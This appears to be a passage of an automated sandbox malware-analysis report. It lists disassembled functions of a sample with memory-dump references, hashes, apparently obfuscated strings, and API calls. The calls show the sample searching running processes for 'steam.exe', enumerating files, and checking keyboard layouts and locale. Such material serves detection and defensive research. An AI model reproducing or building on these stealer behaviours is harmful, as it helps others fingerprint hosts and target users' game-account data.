                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                    • String ID: steam.exe
                                    • API String ID: 2284531361-2826358650
                                    • Opcode ID: 0449b755421ed2bf7497ce1c2105ce7e89b24ccf25e9d5240135408902167dad
                                    • Instruction ID: d042cc8f4a5a1959b7aca3fdf7cbfe0b8a9a0240145e90fbdf55f1ce4034b4f1
                                    • Opcode Fuzzy Hash: 0449b755421ed2bf7497ce1c2105ce7e89b24ccf25e9d5240135408902167dad
                                    • Instruction Fuzzy Hash: 14014471A012195BE720AA649C49FEA776CEF09754F0401E5E928D1040EB7499949BD5
                                    Function 00F74B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F74B51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74B74
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F74B7F
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F74B8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74BA7
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F74BB3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74BDE
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F74BFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID:
                                    • API String ID: 2567437900-0
                                    • Opcode ID: f4ec3ad529c00da1fca4300a90e8c4df9910d7bedb7e0674cad8b06f4680f7cc
                                    • Instruction ID: e7f7f50dd175f5b26947e9e546b9e5c700d1982a783229fc381663d840b37bb8
                                    • Opcode Fuzzy Hash: f4ec3ad529c00da1fca4300a90e8c4df9910d7bedb7e0674cad8b06f4680f7cc
                                    • Instruction Fuzzy Hash: 453185315129199BCB72EF68ED85E9E77B9BF90310F044139F82997211CB78EC01BBA1
                                    Function 01322A60 Relevance: 11.6, Strings: 8, Instructions: 1635COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: (\$7I6}$9-J$Dlz{$NDy$XKy2$wJW<$bm_
                                    • API String ID: 0-848267255
                                    • Opcode ID: d6a0eb8652e893dceba8019b035ce585b56220b9dc477d29560278ba26777fe5
                                    • Instruction ID: 505258d7a957167a62ca65599bce25dbb975d02f04cd2fc5089f0bd658df66b7
                                    • Opcode Fuzzy Hash: d6a0eb8652e893dceba8019b035ce585b56220b9dc477d29560278ba26777fe5
                                    • Instruction Fuzzy Hash: 65B228F3A0C214AFE3046E2DEC4567ABBE9EF94320F16493DEAC5C3744EA3558058796
                                    Function 01318A80 Relevance: 11.6, Strings: 8, Instructions: 1611COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: v$!~^$"{o$@nw$G}o$MIg$P;1$]xG
                                    • API String ID: 0-2946192670
                                    • Opcode ID: 3c4de2647cef70fb497e2c6f6dbbf6588aaa22f80abcb63d93efeef8a2a82572
                                    • Instruction ID: b879aa925b9bf7fb5031b39f3a702a75bfc031897334e68d93f12f9a51867071
                                    • Opcode Fuzzy Hash: 3c4de2647cef70fb497e2c6f6dbbf6588aaa22f80abcb63d93efeef8a2a82572
                                    • Instruction Fuzzy Hash: BFB217F36086009FE304AE2DEC8567ABBE5EFD4720F1A4A3DEAC4C7744E67558058693
                                    Function 00F82D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00F82D9B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F82DAD
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00F82DBA
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F82DEC
                                    • LocalFree.KERNEL32(00000000), ref: 00F82FCA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 0c0ece8df2aff37dfa012a58b5929affc6ad0b3abe9dd78973b6eae45a470145
                                    • Instruction ID: d8c690d0b2f79cd4b49d0b464ec232401a4ef1ea975764254be532d6b19a04e7
                                    • Opcode Fuzzy Hash: 0c0ece8df2aff37dfa012a58b5929affc6ad0b3abe9dd78973b6eae45a470145
                                    • Instruction Fuzzy Hash: D0B10971900204CFC765DF18C948B99B7F1FB44328F29C1ADD418AB2A6D776AD82DF94
                                    Function 01324563 Relevance: 10.3, Strings: 7, Instructions: 1591COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #_W$'Rg|$6;~~$6H^$>'_?$Sk$UJ
                                    • API String ID: 0-1282386379
                                    • Opcode ID: 8c526caacf2bf555990d9dc8a689350e67ba99df1f6b1ed76dce5bc3f670b337
                                    • Instruction ID: 14cefed3110ed5ad75d34b1d407d850d6f604a1072cbd710be1d6f5d7f6f69e9
                                    • Opcode Fuzzy Hash: 8c526caacf2bf555990d9dc8a689350e67ba99df1f6b1ed76dce5bc3f670b337
                                    • Instruction Fuzzy Hash: 07B204F3A0C2049FE3046E2DEC8567ABBE9EFD4320F1A493DE6C487740EA3558058796
                                    Function 0131C52C Relevance: 10.0, Strings: 7, Instructions: 1241COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7X"r$;gY}$YD=s$Y|A$v_Wo$y<u$}<u
                                    • API String ID: 0-630130594
                                    • Opcode ID: db11d967f42689d1e736bb1312946a5c14faee244802422b0a0e7e1ca93ae75a
                                    • Instruction ID: d3f8ea8760b3ce86eb05dfe968fc234149b498811d47b532a92ac00dda958b3d
                                    • Opcode Fuzzy Hash: db11d967f42689d1e736bb1312946a5c14faee244802422b0a0e7e1ca93ae75a
                                    • Instruction Fuzzy Hash: 2D820BF360C2049FE304AE2DEC8567ABBE5EF94720F1A853DEAC5C3744EA3558058693
                                    Function 01329687 Relevance: 9.2, Strings: 6, Instructions: 1659COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @;q$0> $Pf$`z~$2+v$B?v
                                    • API String ID: 0-4177026925
                                    • Opcode ID: 66123f2ae13fef18d5e6471e4f515855dec4f2a60ed89549113e077f1bd4a081
                                    • Instruction ID: 741418a7ec3e65695b73352c21150f02f41a44cfbe34ded058124721b00d2734
                                    • Opcode Fuzzy Hash: 66123f2ae13fef18d5e6471e4f515855dec4f2a60ed89549113e077f1bd4a081
                                    • Instruction Fuzzy Hash: 61B229F3A082049FE304AE2DEC4567ABBE5EFD4720F1A853DEAC4C7744E93598058697
                                    Function 01311FF7 Relevance: 9.1, Strings: 6, Instructions: 1642COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @ZC_$LT}_$QEd$Z3Z$uFw$om
                                    • API String ID: 0-4011615732
                                    • Opcode ID: 6cc8a2596e04e44fe6bf18bede254c7c70ee407e25a5ec4573ca6f401439f887
                                    • Instruction ID: 4af3f9d6ed3ab8f11840355cbb15af8f9949734029b562da6a72612271f4a475
                                    • Opcode Fuzzy Hash: 6cc8a2596e04e44fe6bf18bede254c7c70ee407e25a5ec4573ca6f401439f887
                                    • Instruction Fuzzy Hash: 95B208F3A0C6009FE3046E29EC8567AFBE9EF94720F16493DEAC5C3744EA3558118697
                                    Function 01320FA5 Relevance: 9.1, Strings: 6, Instructions: 1592COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ,$Wo$9<$C"vs$f$w?$fQ^$u~
                                    • API String ID: 0-88732017
                                    • Opcode ID: e3e6fec621ad8cdd92d47766b409b291ad4e5082e28bfa1e6cbc59b4de7715eb
                                    • Instruction ID: fd13b06a82f624ae0776d187db5b392139395ea0177917089c713ce01f57aa58
                                    • Opcode Fuzzy Hash: e3e6fec621ad8cdd92d47766b409b291ad4e5082e28bfa1e6cbc59b4de7715eb
                                    • Instruction Fuzzy Hash: D2B228F39082049FE7046E2DEC4577ABBE9EF94720F1A493DEAC5C3744EA3559008697
                                    Function 01313B2A Relevance: 9.1, Strings: 6, Instructions: 1559COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
